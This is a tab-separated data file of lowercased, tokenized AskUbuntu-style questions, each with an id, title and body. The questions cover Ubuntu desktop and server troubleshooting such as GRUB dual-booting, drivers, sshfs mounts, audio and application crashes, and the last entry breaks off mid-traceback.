517560	zooming with keyboard shortcuts does n't work	i just upgraded ubuntu to the 14.04 version on my laptop . before ( saucy salamander ) i had no problems in zooming for example pdf files ( using say evince ) with keyboard shortcuts , namely i used always ctrl++ and ctrl+- and i never had problems . after the update it happened something strange . the ctrl+- was still working , but ctrl++ was not ! i checked the keyboard settings , they were not corresponding to the above commands , so i changed them and now even the zoom out shortcut is not working . i do n't really understand where the problem is . any help is appreciated ! thanks
517561	configuring two internet connections	first , i 'm know there 's lots of topics about this kind of problem but i ca n't found a solution to my specific problem . in my setup i have a linux server with three interfaces : ethlan for lan with ip 192.168.10.3/24 ethoi for wan oi internet provider with ip 10.1.1.3/24 gw 10.1.1.1 ethgtc for wan gtc internet provider with ip 10.4.1.3/24 gw 10.4.1.1 in principle my setup should be simple : all internet access from the server and lan clients should be routed by ethoi . the ethgtc was used only to incoming traffic for specific services . my /etc/network/interfaces looks like : auto ethlan iface ethlan inet static address 192.168.10.3 netmask 255.255.255.0 network 192.168.10.0 broadcast 192.168.10.255 auto ethoi iface ethoi inet static address 10.1.1.3 netmask 255.255.255.0 network 10.1.1.0 broadcast 10.1.1.255 gateway 10.1.1.1 dns-nameservers 192.168.10.1 8.8.8.8 8.8.4.4 dns-search hsi.local auto ethgtc iface ethgtc inet dhcp and this is my route -n : 0.0.0.0 10.1.1.1 0.0.0.0 ug 0 0 0 ethoi 10.1.1.0 0.0.0.0 255.255.255.0 u 0 0 0 ethoi 10.4.1.0 0.0.0.0 255.255.255.0 u 0 0 0 ethgtc 192.168.10.0 0.0.0.0 255.255.255.0 u 0 0 0 ethlan however i could n't make this work properly . ping 192.168.10.x works but ping machine-name or ping machine-name.hsi.local does n't . but if i down the ethgtc all works fine .
517562	how to group windows in gnome overview	is there a way to have windows grouped by application in the gnome shell `` overview '' ( sorry , i do n't know the correct term ) that appears when pressing the super key ?
517564	only terminal windows appear on tightvnc	i use ubuntu server provided by amazon ec2 . i want gui so that i install ubuntu-desktop on server and edit xstartup . but when i connect to my server through tightvnc it shows only terminal windows . here is the .vnc/xstartup : # ! /bin/sh # uncomment the following two lines for normal desktop : unset session_manager # exec /etc/x11/xinit/xinitrc [ -x /etc/vnc/xstartup ] & & exec /etc/vnc/xstartup [ -r $ home/.xresources ] & & xrdb $ home/.xresources xsetroot -solid grey vncconfig -iconic & x-terminal-emulator -geometry 80x24+10+10 -ls -title `` $ vncdesktop desktop '' & x-window-manager &
517566	13.10 i can ' t use partition with virtualbox	i just installed ubuntu 13.10 as a single os then i installed virtualbox 14.xx but i do not have enough space in /home directory to create a virtual disk of 30 gbyte for windows ; so i try to create virtual disk in /media/alex/_mybox of 60 gbyte virtualbox error : < unable to create the folder in the parent folder of the machine xcsfsf /media/alex/_mybox . check that the folder actually exists and you have permission to create the folder on the machine . > thanx in advance .
517567	hibernating not working ubuntu 14.04	i 'm using acer aspire e1 e1-572g which has no vga drivers for ubuntu ( linux ) . when my battery go down it flasher few times in lock screen and then completely shuts down instead of hibernate according to the settings .when i start it again it will start fresh and all my data will be lost . some internal problems massages will be shown . *normal suspend work perfectly *
517569	nvidia gtx 660m on 14.04 64-bit	i have checked the other questions on here ( e.g . nvidia driver for geforce gtx 660 ) , yet nothing has provided any help . generally , what happens is that i get nvidia-current downloaded and installed , but whenever i reboot , x does not come up and i am sent to a text-only login . starting x manually does not work either . the only thing to do is to purge all nvidia content . any ideas/help ?
517574	unetbootin ubnldr.mbr error during boot up	so basically i 've tried installing ubuntu alongside windows 7 using the live disc but it wo n't recognize my windows 7 installation . so i used unetbootin to install ubuntu alongside windows and after installing unetbootin and trying boot into it and it threw me an error saying it could n't find or run ubnldr.mbr . so now unetbootin wont boot ubuntu what do i do ? ? i have tried using the bcdedit command on command prompt and the boot is set to partition=c . i 've tried reinstalling unetbootin but to no success ! i really need help because i need ubuntu up and running by this weekend ! !
517578	no sound after suspend/standby	for some reason i do n't have any sound after suspend/standby on ubuntu 14.04.1 . it happens on a xmg c504 , and the online solutions do not work . according to alsamixer the 0 is a intel haswell hmdi and the 1 is a realtek alc282 cat /proc/asound/cards 0 [ hdmi ] : hda-intel - hda intel hdmi hda intel hdmi at 0xf7414000 irq 53 1 [ pch ] : hda-intel - hda intel pch hda intel pch at 0xf7410000 irq 52 lspci | grep -i audio 00:03.0 audio device : intel corporation xeon e3-1200 v3/4th gen core processor hd audio controller ( rev 06 ) 00:1b.0 audio device : intel corporation 8 series/c220 series chipset high definition audio controller ( rev 05 ) lsmod | grep -q snd_hda_intel lsmod | grep -q snd_foo return no result this does not work sudo alsa force-reload or this pulseaudio -- kill pulseaudio -- start -- - edit -- - the most funny thing is , if i play something , putt the volume wide open and then mute it it plays for a fraction of a second , this only happens when muting not when unmuting .
517579	how to change spell check language on texworks ( latex editor )	all dictionaries are located on /usr/share/myspell/dicts , but when i go to edit > spelling , i only got the english dictionary
517580	no such partition . grub rescue	i installed ubuntu on one of the two of my hard drives . my other hard drive has windows 7 . when i booted from the ubuntu hard drive but then it had an error and said `` no such partiton . `` . so i disabled my ubuntu hard drive and booted up from the windows 7 hard drive , but same error . please help asap . i tried all the other solutions on the internet but they do n't work . : (
517581	lubuntu 14.04 : how to avoid lock screen on closing laptop lid ?	i upgraded my os from lubuntu 13.10 to lubuntu 14.04 a few days ago , and now my screen locks when the lid is closed , while i want nothing to happen when lid is closed . i have already set the right option in the xfce power manager ( `` when laptop lid is closed : nothing '' ) and , as of https : //bugs.launchpad.net/ubuntu/+source/xfce4-power-manager/+bug/1307545 and closing laptop lid suspends lubuntu , since upgrade , i tried editing /etc/systemd/logind.conf ; but when i close the lid , the screen still locks and asks for a password . note that this does n't happen every time i close the screen ; sometimes it stay closed for a few minutes and can be reopened without having been locked , and sometimes it locks as soon as i close the lid . for reference , here 's the content of my /etc/systemd/logind.conf : # this file is part of systemd . # # systemd is free software ; you can redistribute it and/or modify it # under the terms of the gnu lesser general public license as published by # the free software foundation ; either version 2.1 of the license , or # ( at your option ) any later version . # # see logind.conf ( 5 ) for details [ login ] # nautovts=6 # reservevt=6 # killuserprocesses=no # killonlyusers= # killexcludeusers=root # controllers= # resetcontrollers=cpu # inhibitdelaymaxsec=5 # handlepowerkey=poweroff # handlesuspendkey=suspend # handlehibernatekey=hibernate handlelidswitch=ignore # powerkeyignoreinhibited=no # suspendkeyignoreinhibited=no # hibernatekeyignoreinhibited=no lidswitchignoreinhibited=no # idleaction=ignore # idleactionsec=30min is there 's something wrong with what i 'm doing ? what can i do to be able to close the lid without anything happening ? edit : possible pointers would be about what exactly happens when i close my lid ; i tried investigating in that direction , but i do n't know where to start . if a script or something is called on lid closing , i might even be content with modifying it to do nothing .
517584	easiest way to take a continous series of pictures from a webcam	looking around i found several solutions to take individual pictures ( a few solutions are given here ) and even a series of pictures ( with up to one fps ) . i want to store the pictures in much lower time steps ( 5-10 fps would be great ) and as these solutions operate like : turn on camera -- > take picture -- > turn off camera -- > sleep -- > turn on camera -- > ... i did not find a way to make pictures this fast . thus i am looking for a ( elegant ) solution , which does not turn off the camera . i know of two work-around : open maximized mplayer with webcam stream and make screen shots make snippets of video and convert them back in a series of pictures but these seem very unreasonable ... note : i am explicitly looking for a solution that can be operated from the terminal !
517585	delete tp-trackpoint-elantech	i installed ubuntu on my lenovo t440 and not everything was working fine with the plain installation . so i used the official lenovo wiki to install all drivers . after i installed tp-trackpoint-elantech i discovered that my touchpad does n't work correct . so i removed it with `` apt-get remove tp-trackpoint-elantech '' . after i removed it everything worked well . but after booting the touchpad behaved incorrectly again . so , here comes my question : how can i remove this module from my booting process ?
517586	usb to sata cable adapter not recognizing hard drive	i have a hard drive with linux mint installed that i recently rescued from a dying computer and have been using a usb to sata adapter that comes with an external power adapter to try to get some data off that hard drive onto my netbook which uses ubuntu 12.04 . unfortunately the hard drive wo n't mount , and i ca n't figure out how to access the data in it . there does n't seem to be anything wrong with the hard drive itself . i actually tried installing it on a third computer ( without the sata/usb adapter - just connected the sata cables to it ) and it boots up and runs fine . i checked for signs of disk errors and ran a few diagnostic tests and there are no problems there . any ideas ? here is the output from dmesg : [ 1701.424112 ] usb 1-5 : new high-speed usb device number 4 using ehci_hcd [ 1701.563450 ] scsi5 : usb-storage 1-5:1.0 [ 1702.561062 ] scsi 5:0:0:0 : direct-access toshiba dt01aba200 pq : 0 ansi : 2 ccs [ 1702.564938 ] sd 5:0:0:0 : attached scsi generic sg1 type 0 [ 1702.568257 ] sd 5:0:0:0 : [ sdb ] 488378646 4096-byte logical blocks : ( 2.00 tb/1.81 tib ) [ 1702.569178 ] sd 5:0:0:0 : [ sdb ] write protect is off [ 1702.569200 ] sd 5:0:0:0 : [ sdb ] mode sense : 28 00 00 00 [ 1702.570031 ] sd 5:0:0:0 : [ sdb ] no caching mode page found [ 1702.570046 ] sd 5:0:0:0 : [ sdb ] assuming drive cache : write through [ 1702.574062 ] sd 5:0:0:0 : [ sdb ] 488378646 4096-byte logical blocks : ( 2.00 tb/1.81 tib ) [ 1702.575893 ] sd 5:0:0:0 : [ sdb ] no caching mode page found [ 1702.575907 ] sd 5:0:0:0 : [ sdb ] assuming drive cache : write through [ 1702.614761 ] sdb : sdb1 sdb2 < > [ 1702.614770 ] sdb : partition table partially beyond eod , enabling native capacity [ 1702.615652 ] sd 5:0:0:0 : [ sdb ] 488378646 4096-byte logical blocks : ( 2.00 tb/1.81 tib ) [ 1702.617907 ] sd 5:0:0:0 : [ sdb ] no caching mode page found [ 1702.617921 ] sd 5:0:0:0 : [ sdb ] assuming drive cache : write through [ 1702.618734 ] sdb : sdb1 sdb2 < > [ 1702.618742 ] sdb : partition table partially beyond eod , truncated [ 1702.618756 ] sdb : p1 size 31190188032 extends beyond eod , truncated [ 1702.618935 ] sdb : p2 start 31190220784 is beyond eod , truncated [ 1702.620570 ] sd 5:0:0:0 : [ sdb ] 488378646 4096-byte logical blocks : ( 2.00 tb/1.81 tib ) [ 1702.622106 ] sd 5:0:0:0 : [ sdb ] no caching mode page found [ 1702.622116 ] sd 5:0:0:0 : [ sdb ] assuming drive cache : write through [ 1702.622124 ] sd 5:0:0:0 : [ sdb ] attached scsi disk and fdisk -l fdisk : unable to seek on /dev/sdb : invalid argument in gparted , the /dev/sdb entry shows up as `` unallocated '' . for lsusb : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 004 : id 152d:2338 jmicron technology corp. / jmicron usa technology corp. jm20337 hi-speed usb to sata & pata combo bridge bus 001 device 003 : id 04f2 : b1d6 chicony electronics co. , ltd edit add : here is the product i am using : http : //mail.ultraproducts.com/product_details.php ? cpath=104 & ppath=669 & productid=669 second edit : tried sudo gdisk -l /dev/sdb here is what i get : gpt fdisk ( gdisk ) version 0.8.1 unable to seek to 3898777598 ! aborting ! ebr signature for logical partition invalid ; read 0x82a2 , but should be 0xaa55 error reading logical partitions ! list may be truncated ! partition table scan : mbr : mbr only bsd : not present apm : not present gpt : not present *************************************************************** found invalid gpt and valid mbr ; converting mbr to gpt format . *************************************************************** warning ! secondary partition table overlaps the last partition by 3410396911 blocks ! you will need to delete this partition or resize it in another utility . disk /dev/sdb : 488378646 sectors , 1.8 tib logical sector size : 4096 bytes disk identifier ( guid ) : 331da6d5-3101-4526-bde6-ff79f449fde7 partition table holds up to 128 entries first usable sector is 6 , last usable sector is 488378640 partitions will be aligned on 256-sector boundaries total free space is 2042 sectors ( 8.0 mib ) number start ( sector ) end ( sector ) size code name 1 2048 3898775551 14.5 tib 8300 linux filesystem
517588	driver management software dose n't show anything ( kubuntu )	i was having some problems with my wifi and i decided to check the drivers i have installed using the driver management software in the system settings in kubuntu.but for some reason it dose n't display anything or is there another way to easily check the drivers on kubuntu because i really need to solve my wifi issues before i go back to school.thanks here is a screenshot of what shows up
517589	how to install ubuntu 32-bit on asus c300 chromebook	i have just purchased a chromebook , asus c300 , in hopes that i would be able to install ubuntu on it instead of chrome os . the other options i see are chrubuntu and crouton but neither really give me what i want as i do n't have any need for chrome os and would rather free up the disk space . so right now i have a 32bit copy of 14.04 on a flashdrive ( i did it correctly via a windows machine ) . i turned os verification off on my chromebook and entered it into developer mode which took a few minutes . but when i do recovery mode ( escape + f3 + power ) it says that the usb device does not contain chrome os . so i 'm doing something wrong but i do n't know what . any advice on how to proceed further would be greatly appreciated
517596	steam wo n't start on ubuntu 14.04.1	when i click on the icon from the launcher , nothing happens . when i enter 'steam ' in terminal , i get this : steam running steam on ubuntu 14.04 64-bit steam_runtime is enabled automatically installing breakpad exception handler for appid ( steam ) /version ( 0_client ) uploading dump ( out-of-process ) [ proxy '' ] /tmp/dumps/crash_20140829154109_1.dmp finished uploading minidump ( out-of-process ) : success = no error : libcurl.so : can not open shared object file : no such file or directory /home/stefan/.local/share/steam/steam.sh : line 730 : 6206 segmentation fault ( core dumped ) $ steam_debugger `` $ steamroot/ $ steamexepath '' `` $ @ '' mv : can not stat ‘/home/stefan/.steam/registry.vdf’ : no such file or directory installing bootstrap /home/stefan/.local/share/steam/bootstrap.tar.xz reset complete ! restarting steam by request ... running steam on ubuntu 14.04 64-bit steam_runtime has been set by the user to : /home/stefan/.local/share/steam/ubuntu12_32/steam-runtime installing breakpad exception handler for appid ( steam ) /version ( 0_client ) uploading dump ( out-of-process ) [ proxy '' ] /tmp/dumps/crash_20140829154110_1.dmp finished uploading minidump ( out-of-process ) : success = no error : libcurl.so : can not open shared object file : no such file or directory /home/stefan/.local/share/steam/steam.sh : line 730 : 6332 segmentation fault ( core dumped ) $ steam_debugger `` $ steamroot/ $ steamexepath '' `` $ @ '' what to do ? : ( i installed steam from the ubuntu software center .
517597	problems mounting remote folder	i 'm having a problem mounting a folder called nas in our ubuntu 14lts and with a folder located in one of our nas ( /mnt/nas ) . both are accessible and they can ping each other . i followed these steps in order to automount the nas destination folder : create folder nas at /mnt/ , using mkdir /mnt/nas add the following line in /etc/fstab : sshfs # bmtechnicien @ xxx.xxx.x.xx : /mnt/array1/proton2 /mnt/nas fuse delay_connect , idmap=user , uid=1000 , gid=1000 , umask=0 , allow_other , _netdev , workaround=rename 0 0 use the following command : mount -a . i did not get any error message and proceeded to go to the mounted folder ( cd /mnt/nas ) . problems started : it first says it does n't find it then , when doing an ls in /mnt it does n't find it at all . finally , when doing an ls -la on /mnt folder , i saw that the directory nas has no rights at all and is completely f ... up : d ? ? ? ? ? ? ? ? ? ? ? ? ? ? nas i tried to manually mount the same destination folder on another ubuntu server and it worked , with the following command : sshfs bmtechnicien @ 192.168.1.74 : /mnt/array1/proton2 /mnt/nas if i try to delete the nas folder in /mnt , with rm -r nas , it says i have not the rights although i 'm as root . how could i correct this problem ?
517598	3.13.0-35 kernel causing screen fliker	i just upgraded kernel to 3.13.0-35 . my laptop screen started to flicker . i had to revert to an older kernel for the time being . laptop model : toshiba satellite p205d-s7429 . amd x2 cpu radeon xpress 1200/1250/127
517599	updating php 5.6.0 on ubuntu	my question is how to update php 5.6.0 on ubuntu if my folder with php5 is at : etc/php5
517602	how can i have my login screen use the same wallpaper as my desktop ?	i use pcmanfm to display wallpapers on my desktop . the location of the conf file for pcmanfm is ~/.config/pcmanfm/lubuntu . in this file the wallpaper is simply set in this form : wallpaper=/path/to/image/file/image.jpg how would i go about getting that information to the configuration file of the lightdm greeter ? /etc/xdg/lubuntu/lightdm/lightdm-gtk-greeter.conf the background in the configuration file of the greeter is set like this : background=/path/to/image/file/image.jpg is there any way that i could link it , or something else with the desired result ?
517603	ripoff 0.8.3 not finding any plugins	as of upgrading 14.04 i 've had a problem with ripoff ( i.e . 0.8.3 ) . i get '' no valid ripoff encoding plugin could be found '' under preferences/plugins lo-and-behold no plugins - not even the free ones ! the preferences and about buttons under the empty plugin list are greyed out : ( presumably there i could configure where to find any plugins . the software center says i have ripoff installed ( which i do ) , the synaptic manager says i have it installed , including the mp3 ripoff library in the hope that that might work . i 've completely uninstalled , including removing the mp3 library using the synaptic package manager , and reinstalled with no success . i presume the plugins are somewhere , just not where ripoff is looking for them ? anyone had this problem ? i 've not done anything fancy with this machine ( i rely on it ! ) incidentally , i 've tried extracting tracks from my cds from rhythmbox , and i get something about the operation is not supported by the back end . does something get removed on upgrading ? on upgrading , rhythmbox seemed to rewrite the track titles for the cds i have in my collection . this is a separate problem , but may indicate some other symptom ?
517604	chrome loads then immediatly dissapears	i just put ubuntu on my chromebook in order to be able to do my math homework . its a program called adaptive math practice by carnegie learning . i log on to my student site , click on the link . then , as usual , a the page loads with a blank square . i alwaya have to go up to the right hand corner to the gray shield , and allow the unsafe script to load . then , a link appears in the white box , as usual , that says launch carnegie learning . all of that is normal . but then , when i click that link , it brings it up , the loading bar loads all the way , and then the page dissapears immediately . this is extremely frustrating . i need to do my lath homework , and nothing ive tried has worked .
517609	unable to get exclusive lock , apt-get busy	whenever i try a command , i get an error saying : unable to get exclusive lock also apt-get is busy , but i am not even running any other application .
517610	in a file match a stringa and print lines matching another stringb	basically , i have a large file with more than 5000 lines in the following format below snip given two blocks of the entire file . what i need is to search for given string name ( eg : abcd etc ) , and then print the values in fun : === some contents of a big file ==== string name : abcd used : metric test : ok { fun : add fun : sub fun : mul fun : div } string name : degh used : non -metric test : good { fun : per fun : div fun : add fun : mul } i would like the following output : abcd add abcd sub abcd mul abcd div degh per degh div degh add degh mul what would be the proper way to solve theis problem ?
517611	usb mode switch not working during booting process of os	usb mode switch ejects dongles/data cards/usb modems fairly & correctly when i inserted my modems before boot up or after ubuntu has booted up . during the booting process of os , if i plugin the modem it does not eject storage windows driver cd & i had to eject it through terminal or disks . i am asking this because , i want to make my ubuntu to be mobily & easy to work with my mobile broad band connection . any help or reason for this complication , may be thankfull in advance . thank you , wishes to ubuntu to win every pc ! ! !
517615	number of new messages disappears at launcher icon when parameter 'mail.identity.id1.fcc_folder ' is set to new value	as soon as i change the default value for mail.identity.id1.fcc_folder to the inbox , the small box with the number of new messages on launcher icon disappears and is never shown again . user_pref ( `` mail.identity.id1.fcc_folder '' , `` mailbox : // [ user ] @ [ server ] /inbox '' ) ; all i want is to put automatically all sent messages to inbox folder and see this notification on launcher icon . why are these things related and what would you do to achieve this ?
517621	ca n't find windows 8 in the grub menu [ ubuntu 14.04 ]	so i wanted to dual boot ubuntu and windows 8 as i need windows for certain programs for school . i tried installing and it went smooth , but when i needed windows 8 i could n't find the option for booting it on the grub menu . so i searched for ''system32 '' in the files and i it 's still there but i ca n't boot it . i have a system image for windows 8 on my external hard drive . is there a way to get windows 8 on the grub menu , or do i have to format the the hard drive deleting ubuntu and everything else ?
517623	open folder as another user	there is a method by which i can open any folder ( or execute any operation ) as root ( using sudo ) . is there any method i can use to open a folder or execute any operation as some other user on the system . i need this because i have two users on the system . sometimes ; i need to use stuff from other user 's home folder .
517624	how do i remove ubuntu desktop enviroment ?	how do i remove ubuntu 14.04 desktop enviroment , im using xubuntu now
517625	how to install windows 7 in an extended partition	i installed ubuntu 14.04 a few days back . as i was in a hurry i clicked on the lvm option . now when i open gparted in the live cd , it shows that the sda5 partition has only 16 mb of free space . so is there a way to install windows 7 without having to re install ubuntu as i have a really slow internet connection and it takes like 2 hours to download just the language packs . if not is there a way to backup all the files like language packs and packages , updates etc . to an external hdd ?
517633	how do i run a script on unity login/logout ?	i have two scripts - one to mount some folders over sshfs - and one to unmount . i would like to launch the mount script when my default ubuntu desktop is launched ( after i log in at the graphical console ) - and the unmount script when i `` log out ... '' from the cog-wheel at the top-right of the desktop . please can someone tell me how to achieve this ? what are the most convenient/standard hooks to run commands on desktop launch / exit ? update : solution found the solution was to use upstart tasks . i required two tasks - one fired when the desktop initializes for a user ; the second when the users session expires . the following two scripts work for me under ubuntu 14.04 . in ~/.config/upstart/desktopopen.conf description `` desktop open task '' start on desktop-start task script # commands to mount sshfs go here as shell-script . end script in ~/.config/upstart/desktopclose.conf description `` desktop close task '' start on session-end task script # commands to unmount sshfs go here as shell-script . end script my fingers are crossed that these events will continue to meet requirements in future ubuntu releases . i thought it worth posting my solution here - in case it is of use to others .
517637	sharing folders in ntfs partitions in a network with smb	i have a computer on my office with ubuntu 14.04 and a laptop with the same configuration . i would like to share a folder i have in the office computer inside the network . i went to this folder and clicked on `` sharing options '' , checking both `` share this folder '' and `` guest access '' ( because i figured it would just make it simpler ) . in my laptop , i click on network and then in mercury ( the name of my office computer ) and i see the folder `` movies '' . but when i try to open it , i get an error : `` unable to mount window share : permission denied '' . what have i missed ? update : my folder is in a ntfs partition . is that a problem ?
517638	bluetooth 's driving me crazy !	i 'm using ubuntu 12.04 ( precise pangolin ) . i installed blueman bluetooth manager as i was not satisfied with ubuntu 's default bluetooth manager . anyway , when i try to send multiple files ( pictures and photos , to be specific ) from my android phone ( 4.4.2 kitkat ) , i 'm supposed to get a message asking me to accept or decline the transfer , but i do n't get it . when i try sending files individually , it works fine . anyone got solutions ?
517641	wubi install error ubuntu 14.04	so i tried to install ubuntu 14.04 using wubi and the thing is that when it is done downloading the iso it gives me a error saying `` permission error '' so i went and checked the log file and on one of the lines it says `` could not find bcd id '' i used the bcdedit command on command prompt and there is no sign of ubuntu on there so i know that it has n't installed . i tried putting the ubuntu 14.04 iso next to in the same location as the wubi.exe but that does n't change a thing ! it simply ignores the existing iso and goes on downloading a new one ! ! all help will be appreciated !
517642	trying to make a .desktop file that runs a .py file	i created a .desktop file that looks like this : [ desktop entry ] name = my script comment = test exec= /home/zito/documents/loc_tk.py icon= terminal=false type=application i put the hashbang in the python file # ! /usr/bin/env python and i also set the python file to be executable but every time i double click my .desktop file it brings up the error `` there was an error launching the application '' .
517644	how can i run command with a key	how can i run this command sudo grub-reboot 4 when i pressing ctrl+f12 directly , and without creating script . i want to make a key to reboot machine and select windows as next start-up os in grub boot menu . i tried by adding custom keyboard shortcuts but nothing happens . how can i pass this command directly to terminal and run it from terminal with using a key .
517648	show characters from private use area from a specific font	i 'm using ubuntu 12.04 and i recently made a font but most of its characters reside in the private use area ( pua ) . the problem is that some fonts were already using the pua so that when i insert a character from my font it is rendered as a character from another one , like linux libertine for instance . is there a way to change the default font for pua characters that are displayed ?
517649	firefox address grey / blacked out - google chromium black square over links	similar questions have been asked , but i have not found answer that works for me . this problem started a few weeks ago , but i have not been able to recall what had changed . the only changes i have `` approved '' are the ubuntu updates . in firefox , the address bar is in grey and black boxes where text should be , highlighting whites out everything leaving an orange line across top . in chromium , the black square appears over the links in the upper right portion of page . there is also some cobalt blue text that can be seen in that square . thanks for any suggestions you might have . specifications : ubuntu 12.04 lts ibm s50 thinkcentre desktop screenshot ( s )
517650	a sysprep equivalent for ubuntu server in a vmware environment	i do a number of installs of ubuntu server in our vmware based infrastructure . i 'd like to create a template with limited customizations like tools i depend on and the like . i 'd then like to have a simple tool ( like virt-sysprep ) that pulls out all the specific settings and dumps the system back to a point where it will ask for ip address , name , get drive uuids picked and all that fun stuff on the first boot after a deployment of this as a template . i 've seen their is a `` oem install '' option , but that seems to be for ubuntu desktop . has anyone had experience doing this ? what tools do i need to look into ?
517651	microphone is not working in xubuntu	this is the firs time i am using xubuntu . my microphone is not working on it . i am using hp laptop . it use to work on ubuntu but giving problem here . i am using a headphone . in volume control , it is showing that microphone is available but it is not working . headphone is working ok.my built-in microphone in laptop is not working either . they use to work on ubuntu as well as fedora but are not working here on xubuntu . with lspci , i got this 00:00.0 host bridge : intel corporation mobile pm965/gm965/gl960 memory controller hub ( rev 0c ) 00:02.0 vga compatible controller : intel corporation mobile gm965/gl960 integrated graphics controller ( primary ) ( rev 0c ) 00:02.1 display controller : intel corporation mobile gm965/gl960 integrated graphics controller ( secondary ) ( rev 0c ) 00:1a.0 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 4 ( rev 03 ) 00:1a.1 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 5 ( rev 03 ) 00:1a.7 usb controller : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 2 ( rev 03 ) 00:1b.0 audio device : intel corporation 82801h ( ich8 family ) hd audio controller ( rev 03 ) 00:1c.0 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 1 ( rev 03 ) 00:1c.1 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 2 ( rev 03 ) 00:1c.2 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 3 ( rev 03 ) 00:1c.4 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 5 ( rev 03 ) 00:1d.0 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 1 ( rev 03 ) 00:1d.1 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 2 ( rev 03 ) 00:1d.2 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 3 ( rev 03 ) 00:1d.7 usb controller : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 1 ( rev 03 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev f3 ) 00:1f.0 isa bridge : intel corporation 82801hm ( ich8m ) lpc interface controller ( rev 03 ) 00:1f.1 ide interface : intel corporation 82801hm/hem ( ich8m/ich8m-e ) ide controller ( rev 03 ) 00:1f.2 sata controller : intel corporation 82801hm/hem ( ich8m/ich8m-e ) sata controller [ ahci mode ] ( rev 03 ) 02:04.0 cardbus bridge : ricoh co ltd rl5c476 ii ( rev b6 ) 02:04.1 firewire ( ieee 1394 ) : ricoh co ltd r5c832 ieee 1394 controller ( rev 02 ) 10:00.0 network controller : intel corporation pro/wireless 3945abg [ golan ] network connection ( rev 02 ) 18:00.0 ethernet controller : broadcom corporation netlink bcm5787m gigabit ethernet pci express ( rev 02 ) with lsusb , i got this bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 002 : id 08ff:2580 authentec , inc. aes2501 fingerprint sensor bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub please help .
517652	installed ubuntu 14.04.1 , keyboard and mouse do n't work anymore	i had ubuntu 13.10 which worked just fine . i 've decided to try 14.04 . i 've done an upgrade and when it finished , it booted to desktop but my keyboard and mouse did n't work at all . so i 've decided to try a clean install instead . i 've downloaded the iso for 14.04.1 ( 64 bit ) , checked it 's md5 checksum and made a live usb drive from it . it booted just fine and finished the installation without issues . when finished , it booted to the desktop but again , the mouse and keyboard do n't work at all . i 've tried the advanced options , managed to boot using the failsafex option and the mouse and the keyboard both worked . they also show up with lsusb . the mouse and the keyboard are wireless , made by logitech . what can i do now ? i suspect this is a driver issue but i do n't know linux well enough to tell compare configurations during regular boot which does n't work and the live version which does .
517655	hud displaying partial content on 12.04 lts	i recently installed ubuntu 12.04 lts and everything went well until i tried the heads-up-dsplay . i pressed the alt-key and searched for some videos on my computer , it showed the results . i searched for some other files , it also showed them . the webpage i visited `` http : //www.omgubuntu.co.uk/2012/12/ubuntu-2012-in-pictures-jan-june '' . but , when i typed `` mute '' , it showed nothing . ( the webpage showed a path to go to `` mute '' via `` sound '' ) . but , it did n't work on my laptop . i 've provided the linkenter link description here please help . i do n't the problem is with the hud or canonical update or with my 32-bit of ubuntu itself .
517657	combining pdf files while retaining bookmarks	i have been using pdfunite utility for joining multiple pdf files without much hassle , however , i have observed that bookmarks of the first file are retained but of the rest are just lost ; such is n't observed while i use acrobat 8pro ( under wine ) . plus the added benefit of the latter is say that i have two files : 1 ] introduction.pdf 2 ] result.pdf then when i join these files the resulting file will have two bookmarks corresponding to parent files ' names . is this functionality provided by any linux native utility or some bash ...
517658	software center crashes immediately with keyerror : 'codename ' on elementaryos luna	my software center crashes immediately when i try to open it . in the terminal it looks like this : software-center 2014-08-29 17:44:29,262 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/lib/python2.7/dist-packages/gi/importer.py ' , 51 , 'find_module ' ) ' 2014-08-29 17:44:29,262 - root - error - could not find any typelib for gst 2014-08-29 17:44:29,324 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2014-08-29 17:44:29,329 - softwarecenter.db.database - info - open ( ) database : path=none use_axi=true use_agent=true 2014-08-29 17:44:29,489 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2014-08-29 17:44:29,559 - softwarecenter.ui.gtk3.app - info - show_available_packages : search_text is '' , app is none . 2014-08-29 17:44:29,561 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 176 , in < module > app.run ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1422 , in run self.show_available_packages ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1352 , in show_available_packages self.view_manager.set_active_view ( viewpages.available ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/session/viewmanager.py '' , line 154 , in set_active_view view_widget.init_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/availablepane.py '' , line 171 , in init_view self.apps_filter ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 238 , in __init__ self.build ( desktopdir ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 511 , in build self._build_homepage_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 257 , in _build_homepage_view self._append_banner_ads ( ) file `` 